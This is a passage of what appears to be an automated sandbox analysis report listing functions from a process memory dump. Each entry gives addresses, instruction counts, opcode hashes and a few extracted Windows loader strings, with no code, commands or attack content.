                                                                                                                                                                                                                      • Source File: 00000005.00000002.2213742805.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_f10000_docs.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 0-3916222277
                                                                                                                                                                                                                      • Opcode ID: e50bb092bbaa4174643df7a19a2e6f7c03c32fb3d4031d137befefd0d994f1a3
                                                                                                                                                                                                                      • Instruction ID: 52c2391da54ee7d4fe697db24310f3d2a71edb8d794e96bedcdcaa07d735570b
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e50bb092bbaa4174643df7a19a2e6f7c03c32fb3d4031d137befefd0d994f1a3
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E19164B1940219AFDB21DF94CD86FAE77B8EF04B50F240069F601EB191D775AD04EB60
                                                                                                                                                                                                                      Function 00FEE10E Relevance: 1.5, Strings: 1, Instructions: 255COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000005.00000002.2213742805.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_f10000_docs.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 0-3916222277
                                                                                                                                                                                                                      • Opcode ID: 8f0533e730d8f552262d78f68b7078b14a9490094d4afec93d1aff6682eb7694
                                                                                                                                                                                                                      • Instruction ID: 323bede1d386ade068cc5ec33cec97c75d4bebc50242313b903f94542b2ecce3
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8f0533e730d8f552262d78f68b7078b14a9490094d4afec93d1aff6682eb7694
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2291D232D00589AFDB22AFA5EC45FAFBB79EF85750F100019F500A7251EB789905EB51
                                                                                                                                                                                                                      Function 00F7A660 Relevance: 1.4, Strings: 1, Instructions: 200COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000005.00000002.2213742805.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_f10000_docs.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID: GlobalTags
                                                                                                                                                                                                                      • API String ID: 0-1106856819
                                                                                                                                                                                                                      • Opcode ID: 691a546c9e853acca228d9c867aa43cccd11dd47473ac1a0ea83347b2ab30aa8
                                                                                                                                                                                                                      • Instruction ID: 62d3978907dca023146ce99a6a211233be1e9ddca9a9c8d575a3a3bd80559be3
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 691a546c9e853acca228d9c867aa43cccd11dd47473ac1a0ea83347b2ab30aa8
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: DE716F75E0021A9FDF28DF9AC9916EDBBB1BF48714F24812AE405E7240DB399D41EF50
                                                                                                                                                                                                                      Function 00FE4978 Relevance: 1.4, Strings: 1, Instructions: 153COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000005.00000002.2213742805.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_f10000_docs.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID: .mui
                                                                                                                                                                                                                      • API String ID: 0-1199573805
                                                                                                                                                                                                                      • Opcode ID: 01bbfda2974deda2a37be3674d731775d79f6ed14b774fa38e1f77f2a441d9de
                                                                                                                                                                                                                      • Instruction ID: bf0d86bf4e114450dc27d315b4bb997d6471f2b0c4e3658901076525d527f271
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 01bbfda2974deda2a37be3674d731775d79f6ed14b774fa38e1f77f2a441d9de
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 12519372D002699BCF10DF9AD840AAEB7B5AF44B20F05412EE915BB341D73CAD05EFA4
                                                                                                                                                                                                                      Function 00F5E627 Relevance: 1.4, Strings: 1, Instructions: 148COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000005.00000002.2213742805.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_f10000_docs.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID: EXT-
                                                                                                                                                                                                                      • API String ID: 0-1948896318
                                                                                                                                                                                                                      • Opcode ID: 6f427873c59db60fe2f6e1f0e1e9dd803227ec33060cd833be02e3371bada0ee
                                                                                                                                                                                                                      • Instruction ID: caf829e3309aaeee2f08e845681d7bc946e2026ab1cd9719fb5a1858bd4b68b5
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6f427873c59db60fe2f6e1f0e1e9dd803227ec33060cd833be02e3371bada0ee
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9941B0729083019BD714DA74D841B6BB7E8AF8CB15F04092DFE94E7180E678DA08E797
                                                                                                                                                                                                                      Function 00FBC730 Relevance: 1.4, Strings: 1, Instructions: 129COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000005.00000002.2213742805.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_f10000_docs.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID: BinaryHash
                                                                                                                                                                                                                      • API String ID: 0-2202222882
                                                                                                                                                                                                                      • Opcode ID: 68f645879b6b4df87c8e126e3c2c157c6c44c1ab25fbaf41fa5755bbbe4a38f4
                                                                                                                                                                                                                      • Instruction ID: 8661e708b9de4ab68449a9e5c8bade42b760f2ec69533a6a0971b10039a5dae9
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 68f645879b6b4df87c8e126e3c2c157c6c44c1ab25fbaf41fa5755bbbe4a38f4
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 744163B1D0012CABDB21DA61CC85FDFB77CAB44714F0045A5FA08AB141DB749E899FE4
                                                                                                                                                                                                                      Function 00FC07C3 Relevance: 1.4, Strings: 1, Instructions: 114COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000005.00000002.2213742805.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_f10000_docs.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID: #G/
                                                                                                                                                                                                                      • API String ID: 0-1619875725
                                                                                                                                                                                                                      • Opcode ID: bfa4229c55a8a5cfaf98ae2a9a3696cc69834c5327eb6436381f0210b0854ac3
                                                                                                                                                                                                                      • Instruction ID: fae92503fa372378e705435861451d38cd5604e58f797c6eaa6dbe57fb0c2c9c
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: bfa4229c55a8a5cfaf98ae2a9a3696cc69834c5327eb6436381f0210b0854ac3
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 44417F719043119BD720DF24C845F9BBBE8FF88764F008A2EF598D7291DB749905DB92
                                                                                                                                                                                                                      Function 00FD6B40 Relevance: 1.4, Strings: 1, Instructions: 106COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000005.00000002.2213742805.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_f10000_docs.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID: #
                                                                                                                                                                                                                      • API String ID: 0-1885708031
                                                                                                                                                                                                                      • Opcode ID: 513d06930ebb08bd375bfb02584e7075fe003beff4e81f7a4200a0cf9ca70f34
                                                                                                                                                                                                                      • Instruction ID: 4bd24e7c27e0000177465668f96046f74a3121452ca5e3caa4ff054335ed5a9e
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 513d06930ebb08bd375bfb02584e7075fe003beff4e81f7a4200a0cf9ca70f34
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 24312631A107189BDB22DB68CC50BEE77A9DF44715F18402AE980EB382DB79EC05EB50
                                                                                                                                                                                                                      Function 00FBCA72 Relevance: 1.3, Strings: 1, Instructions: 94COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000005.00000002.2213742805.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_f10000_docs.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID: BinaryName
                                                                                                                                                                                                                      • API String ID: 0-215506332
                                                                                                                                                                                                                      • Opcode ID: 804e06751bf492ba21dc050f549d0160666074b389c75010f7fe30b8a95765fa
                                                                                                                                                                                                                      • Instruction ID: 4c3555687dbda2e83abb17bd3c813826515a70e329d44021e3702763f2d30ed7
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 804e06751bf492ba21dc050f549d0160666074b389c75010f7fe30b8a95765fa
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3031F736D00519AFDB15DB5AC856EAFB7B4EFC0760F118129E905A7291D730AE04EFE0
                                                                                                                                                                                                                      Function 00FC892A Relevance: 1.3, Strings: 1, Instructions: 47COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      • AVRF: AVrfDllUnloadNotification called for a provider (%p) , xrefs: 00FC895E
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000005.00000002.2213742805.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_f10000_docs.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID: AVRF: AVrfDllUnloadNotification called for a provider (%p)
                                                                                                                                                                                                                      • API String ID: 0-702105204
                                                                                                                                                                                                                      • Opcode ID: 34f2ec1471551afb40288e58b3a7784bcf853f2d5caf8fb240b3bf4f79952a20
                                                                                                                                                                                                                      • Instruction ID: dd0e600e755c8a78ae1748446a31d9abed6edc87697ec89aa70d3890a535ba19
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 34f2ec1471551afb40288e58b3a7784bcf853f2d5caf8fb240b3bf4f79952a20
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 04012B326002129BD7249B51DE87F7A7B69EFC2BE0F04042CF58116962CF75AC46F796
                                                                                                                                                                                                                      Function 00FE2000 Relevance: .8, Instructions: 757COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000005.00000002.2213742805.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_f10000_docs.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                      • Opcode ID: e095adc571f87902360212e7932ce2fe74ccfc36d601c9cf16397139c48f1ce4
                                                                                                                                                                                                                      • Instruction ID: 56c293057b9678e5350bf08f4e57f23137fcc7c6011617839f7d2ecb7db2d9fd
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e095adc571f87902360212e7932ce2fe74ccfc36d601c9cf16397139c48f1ce4
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7342F572A083818FD765CF66C891B6BB7E9BF84710F18092EF98287250E734DD45EB52
                                                                                                                                                                                                                      Function 00FD8158 Relevance: .6, Instructions: 617COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000005.00000002.2213742805.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_f10000_docs.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                      • Opcode ID: 3841fe7a7921ce9965df2ef6ec36f5f12ad9248410b24a55cdf4089ba396d200
                                                                                                                                                                                                                      • Instruction ID: c277ef9a9dc2c1bf387a998885d1bcf25d3aa0030754eebfa1f524b0204434f3
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3841fe7a7921ce9965df2ef6ec36f5f12ad9248410b24a55cdf4089ba396d200
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C7424B75E002198FDB24CF69C841BADB7F6BF48350F18819AE949AB342DB349D86DF50
                                                                                                                                                                                                                      Function 00F52840 Relevance: .6, Instructions: 605COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000005.00000002.2213742805.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_f10000_docs.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                      • Opcode ID: af3025cd610cc756380b26cf622ed5a7e8cf4dbf344c18105af0d1f0dbd5721c
                                                                                                                                                                                                                      • Instruction ID: 163844a79d9e8be7195abad47b20c5f9a35c14b6c8458bd63e9bc8ea984b1e7f
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: af3025cd610cc756380b26cf622ed5a7e8cf4dbf344c18105af0d1f0dbd5721c
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3E32CFB1A007558FDB24CF65C8447BEBBF6BF86314F28411DE886DB284D739A805EB50
                                                                                                                                                                                                                      Function 00FEA118 Relevance: .6, Instructions: 591COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000005.00000002.2213742805.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_f10000_docs.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                      • Opcode ID: c0c2a634e5253a8c83900199e22f32900590c2d99aabbdae7ef545d3b2cc7509
                                                                                                                                                                                                                      • Instruction ID: cfc9402898faf413bb3a510f8a01209d5a9fc857bc5daa19da74089c2ecd6936
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c0c2a634e5253a8c83900199e22f32900590c2d99aabbdae7ef545d3b2cc7509
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9C22F475A046D18FDB25CF2AC090372B7F1AF45310F18849AE8968F296D735F852FB62
                                                                                                                                                                                                                      Function 00F46A50 Relevance: .5, Instructions: 548COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000005.00000002.2213742805.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_f10000_docs.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                      • Opcode ID: 1fdcef16bdd66e984bf166ebd5256f6696016f02e605ed7040559c366c1aa8fd
                                                                                                                                                                                                                      • Instruction ID: 03b60290ec8ae5b564e48034d12f79ae2bc1bef991e2030fbfe92c63d0850ccf
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 1fdcef16bdd66e984bf166ebd5256f6696016f02e605ed7040559c366c1aa8fd
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 95327975A00605CFDB24CF68C880BAABBF1FF8A310F258569E955EB391D734AC41EB51
                                                                                                                                                                                                                      Function 00F64A35 Relevance: .4, Instructions: 423COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000005.00000002.2213742805.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_f10000_docs.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                      • Opcode ID: e8a3620866af67e9ba5ee0a5ffcffd4608486dc740fad13053f627f14a392904
                                                                                                                                                                                                                      • Instruction ID: 04b020695729b6725f512a4817f4407571923060da137096ba031862ae751583
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e8a3620866af67e9ba5ee0a5ffcffd4608486dc740fad13053f627f14a392904
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5CF19E71E0121A9BCF15DFA9C980BAEB7F5BF49710F048129E801AB341E774EC42EB60
                                                                                                                                                                                                                      Function 00FD892B Relevance: .4, Instructions: 386COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000005.00000002.2213742805.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_f10000_docs.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                      • Opcode ID: 6e1d7dde807b53bc13976c515dc5ee95562c414b137cf46481d9ad7bec6166b1
                                                                                                                                                                                                                      • Instruction ID: ef11812ce541cf9cfa7e6889b72e7a1bc2cb28fea7b94573e61ba37afa47f574
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6e1d7dde807b53bc13976c515dc5ee95562c414b137cf46481d9ad7bec6166b1
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 16D1F372E006199BDB05CF59C841BFEB7F2AF84394F18816BD855E7380DB39E9069B60
                                                                                                                                                                                                                      Function 00F465D0 Relevance: .4, Instructions: 383COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000005.00000002.2213742805.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_f10000_docs.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                      • Opcode ID: 6f662834c7d1af7b29958680c4348525223af43e71a44db751818f9d1f5a2b1c
                                                                                                                                                                                                                      • Instruction ID: 08735418226108c1d06760e2b59376dce29cc36a149eb961f76bcbe45a0c9322
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6f662834c7d1af7b29958680c4348525223af43e71a44db751818f9d1f5a2b1c
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E8E16C71908341CFC714CF28C490A6ABBE0FF9A318F158A6DE995CB351DB31E949DB92
                                                                                                                                                                                                                      Function 00F38397 Relevance: .4, Instructions: 380COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000005.00000002.2213742805.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_f10000_docs.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                      • Opcode ID: 7b4cc8ed4a67eef2c9d2e47ccb721fbd3f2913ae5f2597d4d51d988180c0e1df
                                                                                                                                                                                                                      • Instruction ID: 445f421de0d2ad0c64f366c597cee07be0c360fccc34b0ca49ddabc5a62acd5c
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 7b4cc8ed4a67eef2c9d2e47ccb721fbd3f2913ae5f2597d4d51d988180c0e1df
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E3D10272A00316DBDF14CF65CD81BBA77A5BF44364F244229F816DB281EB38E946EB50
                                                                                                                                                                                                                      Function 00FC8243 Relevance: .3, Instructions: 322COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000005.00000002.2213742805.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_f10000_docs.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                      • Opcode ID: c58da6bef63a17e65f3132630e1fabe04f2e2fb92a18dec9866503995c4710af
                                                                                                                                                                                                                      • Instruction ID: bee79d83f2aa44d41a6e5e674f0b0fedab746313d62a23a59f659da36ce1f24c
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c58da6bef63a17e65f3132630e1fabe04f2e2fb92a18dec9866503995c4710af
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: FAB19374E006069FDB24DB94CA46FABB7B9BF84394F14442EA90297791DE34ED06EB10
                                                                                                                                                                                                                      Function 00F50535 Relevance: .3, Instructions: 300COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000005.00000002.2213742805.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_f10000_docs.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                      • Opcode ID: c61ad9210afadd02b75b489723f8fea184d45ce3a0816f7da46b339e1a5f1bc9
                                                                                                                                                                                                                      • Instruction ID: a3f16111ac1c4cf9d86ef7fecb6772d21d295fb13ecb6a90440e72cc45dae0f7
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c61ad9210afadd02b75b489723f8fea184d45ce3a0816f7da46b339e1a5f1bc9
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E7B14A72A00645AFDB11DF68C840BBEBBF6AF85310F284165EA42D7281DB74ED45FB90
                                                                                                                                                                                                                      Function 00F483C0 Relevance: .3, Instructions: 281COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000005.00000002.2213742805.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_f10000_docs.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                      • Opcode ID: 1d2f7798d2e3ca9784a72b1180594c3ac9e9a6bb7fe2d2e9901e5c3588fb3613
                                                                                                                                                                                                                      • Instruction ID: c269d02597c1fbf8322bbcbb80ac31f7a60d9afe7eea843552d7b51e902bcbf5
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 1d2f7798d2e3ca9784a72b1180594c3ac9e9a6bb7fe2d2e9901e5c3588fb3613
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 26C169B45083418FD764CF14C484BAFBBE5BF88354F44492DE98987291DB74E909DF92
                                                                                                                                                                                                                      Function 00F3C427 Relevance: .3, Instructions: 280COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000005.00000002.2213742805.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_f10000_docs.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                      • Opcode ID: 0c4c94047ba8576062a977e0f655b3fe9bcc6cbe6e42f9d037fb573d2024fbcc
                                                                                                                                                                                                                      • Instruction ID: 01f58410931a85f57867935ac002f280e230807839ece7b79a10c0c8b86f5ded
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 0c4c94047ba8576062a977e0f655b3fe9bcc6cbe6e42f9d037fb573d2024fbcc
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D6B19170A002658BDB64DF64C890BADB3B1EF44720F1485EAE50AE7291EB34EDC5DF61
                                                                                                                                                                                                                      Function 00F6E5E7 Relevance: .3, Instructions: 278COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000005.00000002.2213742805.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_f10000_docs.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                      • Opcode ID: 4eef6443488f6b944ceac6cfc6db31f73b64b658f7c5c1c8891435b9adabcd69
                                                                                                                                                                                                                      • Instruction ID: 1daf388458e835df53bebe555507d8a53fba0901aa553096b9c336a25f9e2eb5
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4eef6443488f6b944ceac6cfc6db31f73b64b658f7c5c1c8891435b9adabcd69
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: BCA14672E002189FDB21DB98CC48FAEB7B4AF01764F140125E911AB2D1D7789E44EBD1
                                                                                                                                                                                                                      Function 00F80185 Relevance: .3, Instructions: 276COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000005.00000002.2213742805.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
